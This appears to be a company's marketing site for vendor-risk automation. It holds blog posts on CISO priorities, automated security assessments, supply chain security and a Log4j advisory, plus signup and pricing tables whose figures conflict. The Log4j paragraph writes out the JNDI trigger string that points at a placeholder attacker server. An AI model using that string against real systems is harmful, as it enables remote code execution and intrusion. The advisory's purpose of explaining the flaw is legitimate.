2. Emphasizing Effective Risk Management

Risk management isn’t just a box to tick; it’s a continual process. This involves constant vigilance—identifying emerging threats, assessing their potential impact, and implementing controls to counteract them. Today’s cyber threats are dynamic, with cybercriminals using sophisticated techniques that change by the minute. Hence, regular risk assessments and updates are non-negotiable. But, just as crucial is the art of communication. The ability to articulate these risks, along with their potential implications to the board and executives, can make the difference between proactive action and reactive damage control.


3. Moving Beyond Compliance

While regulatory compliance is essential, in 2023, it’s merely a starting point. With the ever-evolving threat landscape, relying solely on regulations and standards can render a business vulnerable. It’s like only installing a front door lock while leaving all the windows open. Instead, a proactive approach, involving continuous assessment and adaptation of security measures to the unique needs and threats faced by your organization, is pivotal.


4. Championing Security Awareness

The human factor can often be the weakest link in any security chain. As such, empowering every single employee with the knowledge and tools to act as the first line of defense is vital. This means ongoing training, regular reminders, and cultivating a culture where security is everyone’s business. Remember, from the receptionist to the CEO, everyone can either be an asset or a vulnerability.


5. Harnessing the Power of Effective Communication

Clear, concise, and compelling communication can be one of the most potent tools in a CISO’s arsenal. It’s essential to translate the often complex world of security into language that everyone—from the tech newbie to the seasoned board member—can grasp. Regularly updating stakeholders about security postures, potential risks, and ongoing initiatives not only fosters trust but also reinforces the importance of collective vigilance.


Expanding the CISO’s Toolkit in 2023:

But let’s push the envelope further. In addition to the critical pointers above, CISOs in 2023 should be aware of:


6. Embracing the Cloud and Zero Trust: 

As businesses transition to cloud infrastructures, understanding cloud security best practices becomes paramount. Moreover, adopting a Zero Trust approach—where every access request is fully authenticated, authorized, and encrypted before granting access—ensures layered defense in a distributed work environment.


7. Machine Learning and AI:

Cybercriminals are leveraging AI; so should you. Incorporating machine learning can help in anomaly detection, identifying potential threats faster than any human could, and enhancing predictive analytics. Findings not only automates assessments and the auditing process for all of your company’s vendors, but we also offer real time updates on your risk posture powered by RiskRecon and Anomali.


8. Regular Penetration Testing:

Gone are the days when an annual penetration test sufficed. Regularly challenging your systems can expose vulnerabilities before cybercriminals exploit them.


9. Incident Response Preparedness:

It’s not about if, but when a breach might occur. Having a well-rehearsed incident response plan ensures rapid containment, minimizing potential damage.


10. Collaborative Security:

Partnering with other businesses, industry groups, and governmental bodies can provide invaluable intelligence and resources. Cybersecurity is a collective endeavor.


In conclusion, being a CISO in 2023 means juggling many balls—compliance, risk management, employee training, effective communication, technological advancements, and more. The threat landscape might be challenging, but with the right approach, tools, and mindset, CISOs can ensure their organizations are robustly defended and primed for growth.


We’re Here To Help

Benefits of Automating Security Assessments for Your Organization

Findings.co explores the benefits of automating security assessments

It is indeed true that companies that fail to leverage automated tools are overlooking significant opportunities. This hold particularly true when it comes to security and compliance. Companies are finding it increasingly challenging to proactively identify, address, and mitigate security issues, since, well – there’s more threats than ever. Conducting regular security assessments is essential to detect vulnerabilities and reduce the risk of future breaches. However, relying on manual methods and outdated procedures can be unreliable and diminish the effectiveness of risk mitigation strategies. To ensure secure and robust networks, as a business leader, you must prioritize the implementation of automated security assessments. They not only minimize risk exposure, but they can shorten the sales cycle and save a company money, and they also strengthen cybersecurity defenses, making it a crucial investment for your company. 

(Source: CISA – Continuous Diagnostics and Mitigation Learning Program: Benefits of Automating Security Control Assessments)

Automation Speeds Up Reaction and Activity:

Automation plays a vital role in streamlining processes and driving transformation in modern industries. By automating the risk assessment process and management, organizations can make informed financial decisions, streamline risk and compliance procedures, and enhance their overall risk profile. This automation eliminates human error, enables faster response times, and promotes growth. Real-time threat information and risk reports empower security teams to handle threats more effectively and improve response and action times. Automated risk management strategies can efficiently compile, classify, upload, and organize incoming data, which allows for the identification of similar incidents and the implementation of prepared actions or responses.

Enhanced Cybersecurity Risk Management:

Automated assessments provide organizations the ability to manage cybersecurity risks more comprehensively and effectively. These assessments offer security teams up-to-date and detailed data about ALL their vendors that can be shared with senior management and executives. By eliminating manual tasks and enabling real-time monitoring, automation allows risk managers to focus on risk avoidance and mitigation. Furthermore, automation expedites the entire risk management process by instantly uploading fresh data and promptly reporting any issues. Through continuous monitoring and real-time visibility, organizations can identify gaps in their cybersecurity posture and take the necessary security measures to rectify them.

Standardizing Data and Improving Collaboration:

In many organizations, different departments rely on separate and potentially incompatible data to analyze and assess cyber risks. With so much data floating around in different hands, conflicting reports create confusion among managers. Automated security assessments provide a centralized platform for data collection, ensuring consistent and standardized data across the organization. This eliminates discrepancies and enables effective collaboration among departments. Executives and managers can access accurate and comprehensive information, leading to better-informed decision-making and improved cyber risk management strategies.

Scaling Security Risk Assessment:

Automation significantly simplifies the scalability of security risk assessment processes within a company. Automated assessment platforms like Findings are designed to handle both small and large-scale tasks, allowing organizations to adapt to changing demands without the need for hiring and training new personnel. Predictability is another advantage of automation, as most response actions can be anticipated, making it easier to manage various system interactions securely. Additionally, automation provides better tracking capabilities, allowing organizations to monitor progress, identify completed assessment components, and address pending tasks more efficiently.

Measuring ROI of Automation:

Calculating the return on investment (ROI) for automated security risk assessment involves considering the time and resources saved by automating time-consuming tasks and preventing adverse outcomes. While evaluating the ROI for automated security risk assessment may differ from other business operations, the goal is to demonstrate to IT management that the investment was worthwhile, considering the resources and time allocated.

Out With the Old, in With the New:

In today’s digital landscape, where cyberattacks are a constant threat, automating security assessments is not just beneficial but imperative for organizations aiming to protect their assets, maintain customer trust, and ensure business continuity. It is an investment that pays off in terms of enhanced security, streamlined processes, and improved risk management.

Collaborating with companies like Findings – who specialize in security risk assessment automation can help organizations identify weaknesses and risks more effectively. Automated security risk assessments provide a proactive approach to maintaining the security of organizational systems, preventing potential breaches, and ensuring a safe operating environment. By leveraging automation, organizations can improve response times, standardize data, enhance collaboration, and scale security risk assessment processes. It is crucial for businesses to embrace automation.


Learn More Today

What is Log4j vulnerability? Do you need to worry?

Findings VDP | log4j mitigation

Log4j vulnerability,  CVE-2021-44228, became public on December 9, 2021.

This easily triggered log4j vulnerability can be used to gain RCE (remote code execution) in vulnerable systems when the Apache Log4j utility is used. Other Apache products are vulnerable as well, such as Apache Solr.

 

Log4j is easily triggered just by log a special string {jndi:ldap://<attacker’s server>/a}; it impacts Apache Log4j version 2.0-beta9 to 2.15.0-rc, and is common in enterprise software and cloud servers across industry. Unless fixed, it enables easy access to internal networks that can end up with valuable data theft, malware implementation, crucial information deletion, and more.

 

This vulnerability is so critical, that it received the rare 10 out of 10 CVSS scores.

 

Fortunately, not everyone is affected, and mitigation can be easily applied, but first, it is recommended to check if you have been exposed to log4j easily, using Findings’ log4j free VDaaS tool.

 

For more information, feel free to visit our log4j information page

A Complete Checklist To Supply Chain Security

A complete checklist for supply chain security | Findings - Supply Chain Security Automation

Cybersecurity compliance frameworks and standards are a great starting point for managing supply chain security risks. But if your security strategy hinges solely on frameworks, you’re doing it wrong.

As The Cybersecurity Place puts it, “compliance alone won’t save you” from modern security risks.

Indeed, while embracing a cybersecurity framework is an important — and, for many organizations, necessary — first step toward securing the supply chain, businesses shoot themselves in the foot if they stop with framework adoption alone. No matter which framework you use internally, or which frameworks you require your vendors to comply with, the framework on its own is of limited value. You must also implement processes that actually operationalize the framework, allowing you to enforce compliance among your vendors.

Let’s take a look at what goes into a complete supply chain security strategy. As we’ll see, it starts with cybersecurity frameworks like NIST and ENISA, but it extends far beyond those frameworks alone.

The core components of a cybersecurity framework: The NIST example

Cybersecurity frameworks are an excellent foundation that helps businesses define overarching supply chain security principles.

For example, the NIST framework, which is popular among U.S. companies (European companies tend to use ENISA, which is similar to NIST), defines rules designed to help businesses achieve four key goals:

  • Identify: NIST requires processes that allow organizations to identify and understand their cybersecurity risks.
  • Protect: After risks have been identified, NIST requires businesses to take steps to mitigate them in order to improve their cybersecurity posture.
  • Detect: As not all risks can be identified and mitigated, NIST also requires ongoing efforts to detect active threats.
  • Respond: When active threats have been detected, NIST requires responses that can contain and eliminate them.

By adopting a framework like NIST or ENISA, then, businesses gain a high-level architecture that helps them plan a cybersecurity strategy.

Processing tools for supply chain security

The main limitation of frameworks alone is that they provide little if any specific guidance on how to turn high-level cybersecurity principles into practice. As a result, businesses also need to implement security processing tools that allow them to operationalize cybersecurity practices in ways that align with framework requirements.

Processing tools do this in the context of supply chain security by providing:

  • Vulnerability assessment: Processing tools identify risks within the products and services that third-party vendors supply to a business.
  • Coverage assessment: Processing tools help identify situations where vendors lack effective cybersecurity coverage.
  • Visibility assessment: Processing tools enable businesses to profile their vendors and suppliers in order to understand which risks exist within their systems — and which risks could, by extension, flow down the supply chain.
  • Business alignment: With processing tools, businesses can determine which risks in the supply chain pose the greatest threats to their operations. This context is essential because not all vendors and risks are of equal importance within a supply chain.

By providing this functionality in an automated way, processing tools go far in closing the gap between principle and practice. Indeed, as the SANS Institute says, automation is the only way to enforce security compliance mandates in complicated contexts like supply chains.

Managing contractual requirements

What do you do when processing tools reveal that vendors are not fully adhering to your cybersecurity requirements?

That’s where contracts and evidence come into play. Companies must maintain documents and signatures related to the security frameworks they adopt within their supply chains, then use them to enforce compliance when violations occur. Contracts also play an important role in determining which disclosures are required in the event of a supply chain breach.

Remember to update your contracts if, for example, you adopt a newer version of a cybersecurity framework or change your supply chain in a way that imposes new compliance requirements or verifications.

Most large organizations manage contractual requirements through a dedicated security team or CISO. At smaller organizations, a procurement team or IT team typically handles this responsibility. Your specific approach to vendor contract management is not as important as ensuring there is a systematic process in place for defining and enforcing contractual security agreements across your supply chain.

Supply chain security management: Responding to a crisis

The final key step in managing supply chain risks is having a plan in place to respond to incidents when they occur. You don’t want to wait for a breach to decide what to disclose, or how to contain the threat and so on.

Your response plan should define the following points:

  • Who will perform which tasks in response to an incident. Remember that many incidents require responses not just from technical stakeholders, but from other departments such as the legal, PR and others.
  • Which vendors you will use as a backup in the event that one key vendor is breached.
  • How the response will be documented.
  • How you will determine whether public disclosure of a breach is required, and how you will manage that disclosure.

In addition to developing a response plan, run drills so that your team can practice responding to a supply chain breach, before a real-life incident occurs. You should also strive to keep your team focused on the big picture. As you can’t predict the exact nature of a breach, it’s best to learn how to think holistically and creatively about managing incidents, rather than investing in rote reaction plans that may be too specific to apply to a given incident.

Last but not least, ensure that you have a response plan that will allow you to react quickly and effectively when a major security incident occurs within your supply chain. Your goal should be to resolve the incident in a way that protects your operations, customers and reputation, while also demonstrating to partners that supply chain security is a key priority.

How Your Competitors Are Preventing Supply Chain Attacks

How Your Competitors Are Preventing Supply Chain Attacks | Findings.co

Supply chain security threats are like the flu: Sooner or later, they’re bound to impact you, no matter how hard you try to avoid them.

Indeed, by their very nature, supply chain attacks are more likely to affect large numbers of organizations than most other types of breaches. The majority of cyber threats target individual companies. But a single supply chain attack could impact hundreds or thousands of businesses at once if it compromises software or data within their supply chains.

For proof of just how pervasive supply chain security risks are, you need only look at recent examples. The SolarWinds breach impacted dozens of organizations, including major U.S. federal agencies. The Kaseya breach extended to thousands of businesses spread throughout the world that use Kaseya’s software. Expect more figures like these as the prevalence of supply chain attacks — a threat that one major security research report called “staggeringly high” —continues to grow at rates approaching 400 percent.

That’s the bad news. The good news is that, as explained below, there are effective steps you can take to protect your business from supply chain risks. They won’t completely guarantee immunity from attack, but they’ll go a long way toward mitigating the threat.

Why supply chains are so risky?

The first step in managing supply chain threats is understanding what makes supply chains inherently risky.


The reasons are simple enough: Supply chains typically involve many suppliers, and it’s difficult to maintain visibility into the security state of each of them.


By comparison, it’s relatively easy to secure your own IT assets — meaning those you deploy and manage yourself. But it’s much harder to ensure that your vendors’ and suppliers’ IT environments are secure — especially when you have dozens or hundreds of vendors in your supply chain.

Managing supply chain security: The typical response

The typical playbook for managing supply chain risks includes some basic steps:

  • Compliance: Requiring suppliers to adhere to cybersecurity standards like the U.S. government’s NIST framework or the E.U.’s ENISA/ISO can help to reduce the prevalence of threats. But actually enforcing compliance across third-party vendors’ businesses can be difficult.
  • Vetting: Businesses often enforce vetting processes for new vendors. That’s good, but it doesn’t guarantee that you’ll avoid risks once a vendor relationship has already been established.
  • Cybersecurity teams: Investing in cybersecurity expertise can help harden IT assets against attack. But your own cybersecurity experts can’t do much to protect the assets of your vendors.

These are all useful strategies for managing supply chain risks. But they’re not enough on their own to make your security posture as strong as possible.

Going further to secure the supply chain

Beyond those basic supply chain security steps, businesses should implement additional measures to make their supply chains as safe as possible.

Access control

Businesses should implement tight access controls to govern who can access their systems. Access should be defined in a granular way and restricted by the principle of least privilege.

In many countries, regulations ensure that supply chain cyber security is legally required. Companies must comply with a security framework and checklist. Once this checklist is completed the vendor can prove increased controls are in place.  While strong access controls won’t prevent risks in your supply chain, they will mitigate the chances that a vendor’s cybersecurity problem becomes your cybersecurity problem.

Technology investment

Given the complexity and scale of modern supply chains, managing their security manually is not feasible in most cases. That’s why it’s wise to invest in tools that are purpose-built to assess and manage supply chain risks automatically, across all vendors’ IT estates.

Maximum visibility and coverage

Along similar lines, businesses should leverage automation technology to maximize their ability to identify and track security risks within their supply chains. This is also a process that you can’t handle manually unless you have a very simple supply chain.

Vendor Education

In addition to asking your vendors to be secure, consider providing educational resources that explain exactly how they should secure their assets. These resources could be based on cybersecurity standards that you want to enforce across your supply chain. Your vendor’s transparency should a breach occur could provide valuable feedback to others in that supply chain.

Assess vendor risk

Not all vendors pose the same level of risk. Risks vary depending on which types of data and applications the vendors supply or integrate with, and how important the vendors are to your business.

This means you should contextualize vendor risk and enforce security safeguards accordingly. High-risk vendors may require stronger oversight than those whose assets play a less central role in your operations.

Cybersecurity drills

Planning how to respond to a supply chain breach, then practicing the response via cybersecurity drills, goes a long way toward helping ensure a fast and effective resolution when attacks occur. In particular, your response plan and drills should address:

  • Business risks: It should be easy to identify which parts of the business are impacted by a breach and what level of risk their disruption poses to the overall business.
  • Manual vs. automated processes: Which response processes can be automated, and which will need to be performed manually? You’ll want to answer these questions before the breach occurs.
  • Mediation: Which teams or stakeholders will take the lead in managing a supply chain breach? If your organization does not have a CISO in place, then another person from either procurement or the I.T.  department could be appointed. Immediate decision-making in a crisis is critical.
  • Disclosure: How will you announce a breach to your customers and partners? How much information should you include about the breach? Different types of breaches and vendors may require different disclosures.

Response drills prepare you to remove risky components from your supply chain rapidly with minimal disruption to business operations.

Supply chain assessment

The most secure business is one that continuously assesses its supply chain to identify its weakest links from a security perspective. Again, not all vendors pose the same level of risk, and not all vendors can be assessed in the same way. You must implement an assessment process tailored to your particular supply chain.

As CIO Review explains, “While threats cannot be completely eliminated, supply chain security can contribute to a more secure, efficient flow of goods that can recover quickly from disruptions.”

In other words, the fact that supply chain security is impossible to guarantee completely is not an excuse for ignoring it. It’s absolutely critical to take not only basic steps for defending your supply chain, but also implementing advanced measures — such as practicing responses and automating supply chain visibility as much as possible — that can bring your risks as close as possible to zero.

Start Now For Free

 

Supply Chain Risk Monitoring as a Service
Join us today
Supply Chain Risk Monitoring as a Service
Join us today
Waitlist signup

Welcome to Findings

Let's go over some details to setup your tailor-made account


Please fill your details below and click "Next" to create your account:

Payment

Feature
Startup
Business
Enterprise
Price
$10 / Month
$10 / Month
$25 / Month
VDPaaS
Alerts
Assessments
Integrated Apps
API
Join today and scan ALL YOUR VENDORS for FREE*
* FREE VENDOR SCAN for all of your vendors during your first month.
Feature
Startup
Business
Enterprise
Price
$25 / Month
$200 / Month*
Contact Us
Free vendors scan for 1 month
Findings search engine
Rapid security and compliance profile
Profile/showcase engagements per year
5
40
Unlimited
Multi/unlimited showcase use cases
Showcase compliance badge for your website
Best practice self-assessment
1 Findings or 1 BYOC
Assessment response automation
Personalizable, branded security & compliance showcase page
File/evidence repository
OKTA
DKIM
Out-of-the-box TPRM
20 vendors +
20 rating scans
50 vendors +
50 rating scans
Support
Email
Priority via Phone / Email
Internal Workflows (SO/BO)
Onboarding and customization account setup
*Price for every 40 engagements
Automate assessment response and showcase your cybersecurity posture
Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!

Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!